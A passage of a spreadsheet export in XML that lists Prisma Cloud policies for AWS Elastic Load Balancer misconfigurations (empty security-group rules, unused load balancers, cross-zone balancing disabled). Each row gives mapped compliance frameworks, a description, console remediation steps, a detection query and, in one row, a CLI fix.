          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, MLPS 2.0, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, ISO/IEC 27002:2013, MAS TRM 2021, ISO/IEC 27002:2013, MAS TRM 2021, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, CIS Controls v7.1, SOC 2, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Fedramp (Moderate), Telecommunications Security Act - TSA, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, CHC HITRUST CSF v.9.6.0, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev4, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, MLPS 2.0 (Level 3), NIST 800-53 Rev 5, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ITSG-33, ISO/IEC 27002:2013, CRI Profile v2.0, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, GDPR, NIST CSF, SOC 2, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B1898" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1898" s="2" t="inlineStr"/>
      <c r="D1898" t="inlineStr"/>
      <c r="E1898" t="inlineStr"/>
      <c r="F1898" t="inlineStr"/>
      <c r="G1898" t="b">
        <v>0</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1898" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1898" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (ELB) has security group with no inbound rules</t>
        </is>
      </c>
      <c r="L1898" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1898" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1898" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1898" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1898" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1898" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R1898" t="inlineStr">
        <is>
          <t>AC-17 (2)</t>
        </is>
      </c>
      <c r="S1898" t="inlineStr"/>
      <c r="T1898" t="b">
        <v>0</v>
      </c>
      <c r="U1898" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1898" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1898" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers (ELB) which have security group with no inbound rules. A security group with no inbound rule will deny all incoming requests. ELB security groups should have at least one inbound rule, ELB with no inbound permissions will deny all traffic incoming to ELB; in other words, the ELB is useless without inbound permissions.</t>
        </is>
      </c>
      <c r="X1898" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 Dashboard
4. Click on 'Load Balancers', choose the reported load balancer
5. Click on the 'Description' tab, click on the security group, it will open Security Group properties in a new tab in your browser
6. Click on the 'Inbound Rules'
7. If there are no rules, click on 'Edit rules', add an inbound rule according to your ELB functional requirement
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1898" t="inlineStr"/>
      <c r="Z1898" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elb-describe-load-balancers' as X; config from cloud.resource where api.name = 'aws-ec2-describe-security-groups' as Y; filter '$.X.description.securityGroups[*] contains $.Y.groupId and $.Y.ipPermissions[*] is empty'; show X;</t>
        </is>
      </c>
      <c r="AA1898" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1898" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1898" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-315</t>
        </is>
      </c>
      <c r="AD1898" t="b">
        <v>1</v>
      </c>
      <c r="AE1898" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1898" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>f2b80edb-79d3-4842-b86a-3bbbcfd95c98</t>
        </is>
      </c>
      <c r="AI1898" t="inlineStr">
        <is>
          <t>30fb1cc3-9161-4e5b-9322-b5692b71f0d5</t>
        </is>
      </c>
      <c r="AJ1898" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1898" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1899">
      <c r="A1899" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, MLPS 2.0, PCI DSS v4.0, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CSA CCM v.4.0.1, MPAA Content Protection Best Practices, NIST SP 800-171 Revision 3, PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, CSA CCM v.4.0.1, GDPR, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, ISO/IEC 27002:2013, MAS TRM 2021, ISO/IEC 27002:2013, MAS TRM 2021, NIST 800-53 Rev4, NIST 800-53 Rev 5, CIS Controls v7.1, PCI DSS v4.0, NIST CSF, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, PCI DSS v4.0, TX-RAMP Level 1, Telecommunications Security Act - TSA, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), ISO 27002:2022, CSA CCM v.4.0.1, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27018:2019, PCI DSS v4.0, CHC HITRUST CSF v.9.6.0, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, CSA CCM v.4.0.1, CSA CCM v.4.0.1, MLPS 2.0 (Level 3), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, ISO/IEC 27002:2013, PCI DSS v4.0, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ITSG-33, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v3.2.1, GDPR, NIST CSF, PCI DSS v4.0, PCI DSS v4.0, SOC 2, NIST CSF, kfirdaus AWS Account-CS, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Australian Energy Sector Cyber Security Framework (AESCSF), CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, NIST CSF, PCI DSS v4.0, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B1899" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1899" s="2" t="inlineStr"/>
      <c r="D1899" t="inlineStr"/>
      <c r="E1899" t="inlineStr"/>
      <c r="F1899" t="inlineStr"/>
      <c r="G1899" t="b">
        <v>0</v>
      </c>
      <c r="H18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899" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1899" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1899" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (ELB) has security group with no outbound rules</t>
        </is>
      </c>
      <c r="L1899" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1899" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1899" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1899" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1899" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1899" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1899" t="inlineStr">
        <is>
          <t>ISM-1628</t>
        </is>
      </c>
      <c r="S1899" t="inlineStr"/>
      <c r="T1899" t="b">
        <v>0</v>
      </c>
      <c r="U1899" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1899" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1899" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers (ELB) which have security group with no outbound rules. A security group with no outbound rule will deny all outgoing requests. ELB security groups should have at least one outbound rule, ELB with no outbound permissions will deny all traffic going to any EC2 instances or resources configured behind that ELB; in other words, the ELB is useless without outbound permissions.</t>
        </is>
      </c>
      <c r="X1899" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 Dashboard
4. Click on 'Load Balancers', choose the reported load balancer
5. Click on the 'Description' tab, click on the security group, it will open Security Group properties in a new tab in your browser
6. Click on the 'Outbound Rules'
7. If there are no rules, click on 'Edit rules', add an outbound rule according to your ELB functional requirement
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1899" t="inlineStr"/>
      <c r="Z1899" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elb-describe-load-balancers' as X; config from cloud.resource where api.name = 'aws-ec2-describe-security-groups' as Y; filter '$.X.description.securityGroups[*] contains $.Y.groupId and $.Y.ipPermissionsEgress[*] is empty'; show X;</t>
        </is>
      </c>
      <c r="AA1899" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1899" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1899" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-311</t>
        </is>
      </c>
      <c r="AD1899" t="b">
        <v>1</v>
      </c>
      <c r="AE1899" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1899" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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899" t="inlineStr">
        <is>
          <t>bc6fafc0-c5f8-4ddd-b07d-0e4394c06ad0</t>
        </is>
      </c>
      <c r="AI1899" t="inlineStr">
        <is>
          <t>886dc8ea-3c1b-4a7c-819c-610870e7042d</t>
        </is>
      </c>
      <c r="AJ1899" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1899" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1900">
      <c r="A1900" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, ISO 27001:2013, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, kashan ACSC Information Security Manual (ISM), NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1900" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1900" s="2" t="inlineStr"/>
      <c r="D1900" t="inlineStr"/>
      <c r="E1900" t="inlineStr"/>
      <c r="F1900" t="inlineStr"/>
      <c r="G1900" t="b">
        <v>0</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1900" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1900" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (ELB) not in use</t>
        </is>
      </c>
      <c r="L1900" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1900" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1900" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1900" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1900" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1900" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1900" t="inlineStr">
        <is>
          <t>ISM-1438</t>
        </is>
      </c>
      <c r="S1900" t="inlineStr"/>
      <c r="T1900" t="b">
        <v>0</v>
      </c>
      <c r="U1900" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1900" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1900" t="inlineStr">
        <is>
          <t>This policy identifies unused Elastic Load Balancers (ELBs) in your AWS account. Any Elastic Load Balancer in your AWS account is adding charges to your monthly bill, although it is not used by any resources. As a best practice, it is recommended to remove ELBs that are not associated with any instances, it will also help you avoid unexpected charges on your bill.</t>
        </is>
      </c>
      <c r="X1900" t="inlineStr">
        <is>
          <t>To check and remove ELB that has no registered instances, perform the following:
1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 dashboard
4. In the navigation pane, under 'LOAD BALANCING', click on 'Load Balancers'
5. Select reported Elastic Load Balancer
6. Select the 'Description' tab from the bottom panel
7. In 'Basic Configuration' section, see If the selected load balancer 'Status' is '0 of 0 instances in service'.
It means that there are no registered instances and the ELB can be safely removed.
8. Click the 'Actions' dropdown from the ELB dashboard top menu
9. Select Delete
10. In the 'Delete Load Balancer' pop-up dialog, confirm the action to delete on clicking 'Yes, Delete' button</t>
        </is>
      </c>
      <c r="Y1900" t="inlineStr"/>
      <c r="Z1900" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = 'instancesAttached is false'</t>
        </is>
      </c>
      <c r="AA1900" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1900" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1900" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-173</t>
        </is>
      </c>
      <c r="AD1900" t="b">
        <v>1</v>
      </c>
      <c r="AE1900" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1900" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
          <t>6099ef63-9c5e-46d3-9632-db1c7f05e687</t>
        </is>
      </c>
      <c r="AI1900" t="inlineStr">
        <is>
          <t>407d411b-f71f-41d9-9483-394086c4185b</t>
        </is>
      </c>
      <c r="AJ1900" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1900" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1901">
      <c r="A1901" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, NIST 800-53 Rev4, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 3), MLPS 2.0, HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], NYDFS 23 CRR-NY 500.0, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, kashan ACSC Information Security Manual (ISM), NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1901" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1901" s="2" t="inlineStr"/>
      <c r="D1901" t="inlineStr"/>
      <c r="E1901" t="inlineStr"/>
      <c r="F1901" t="inlineStr"/>
      <c r="G1901" t="b">
        <v>1</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1901" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1901" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (Classic) with cross-zone load balancing disabled</t>
        </is>
      </c>
      <c r="L1901" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1901" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1901" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1901" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1901" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1901" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1901" t="inlineStr">
        <is>
          <t>ISM-1438</t>
        </is>
      </c>
      <c r="S1901" t="inlineStr"/>
      <c r="T1901" t="b">
        <v>1</v>
      </c>
      <c r="U1901" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1901" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1901" t="inlineStr">
        <is>
          <t>This policy identifies Classic Elastic Load Balancers which have cross-zone load balancing disabled. When Cross-zone load balancing enabled, classic load balancer distributes requests evenly across the registered instances in all enabled Availability Zones. Cross-zone load balancing reduces the need to maintain equivalent numbers of instances in each enabled Availability Zone, and improves your application's ability to handle the loss of one or more instances.</t>
        </is>
      </c>
      <c r="X1901" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 dashboard
4. Click on 'Load Balancers' (Left Panel)
5. Select the reported ELB
6. On the Description tab, choose 'Change cross-zone load balancing setting'
7. On the 'Configure Cross-Zone Load Balancing' popup dialog, select 'Enable'
8. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled</t>
        </is>
      </c>
      <c r="Y1901" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'elasticloadbalancing:ModifyLoadBalancerAttributes' permission. Successful execution will enable cross-zone load balancing for the respective Elastic Load Balancers.",
'impact': 'Enable cross-zone load balancing for the respective Elastic Load Balancer',
'cliScriptTemplate': 'aws elb modify-load-balancer-attributes --load-balancer-name $resourceName --region $region --load-balancer-attributes "\\"CrossZoneLoadBalancing\\":\\"Enabled\\":true"'</t>
        </is>
      </c>
      <c r="Z1901" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = 'attributes.crossZoneLoadBalancing.enabled is false'
{"category":"Networking","resourceTypes":["aws_elb"]}</t>
        </is>
      </c>
      <c r="AA1901" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1901" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1901" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-266-CKV_AWS_138</t>
        </is>
      </c>
      <c r="AD1901" t="b">
        <v>1</v>
      </c>
      <c r="AE1901" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1901" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>551ee7ba-edb6-468e-a018-8774da9b1e85</t>
        </is>
      </c>
      <c r="AI1901" t="inlineStr">
        <is>
          <t>194dc989-ec4c-426c-826f-d7365d9a59ed</t>
        </is>
      </c>
      <c r="AJ1901" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1901" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1902">
      <c r="A1902" t="inlineStr">
        <is>
          <t>CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27017:2015, PCI DSS v3.2.1, TX-RAMP Level 2, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, MLPS 2.0 (Level 3), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, MLPS 2.0 (Level 3), kashan ACSC Information Security Manual (ISM), ISO 27002:2022, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, HITRUST v.9.4.2 [Deprecated], Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, MLPS 2.0, CIS Controls v8.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), CSA CCM v4.0.12, MAS TRM 2021, TX-RAMP Level 2, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CSA CCM v.4.0.6, NIST 800-53 Rev 5, NIST CSF v2.0, Secure Controls Framework (SCF) - 2024.2, Fedramp (Moderate), Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, jneytchev-fedramp-low, CSA CCM v.4.0.6, Fedramp (Low), NIST CSF, ISO 27002:2022, ISO/IEC 27001:2022, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO/IEC 27017:2015, NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CSA CCM v4.0.12, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), CSA CCM v4.0.12, NIST 800-53 Rev4, ISO/IEC 27017:2015, FFIEC, CSA CCM v.4.0.1, CRI Profile v2.0, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, MAS TRM 2021, Secure Controls Framework (SCF) - 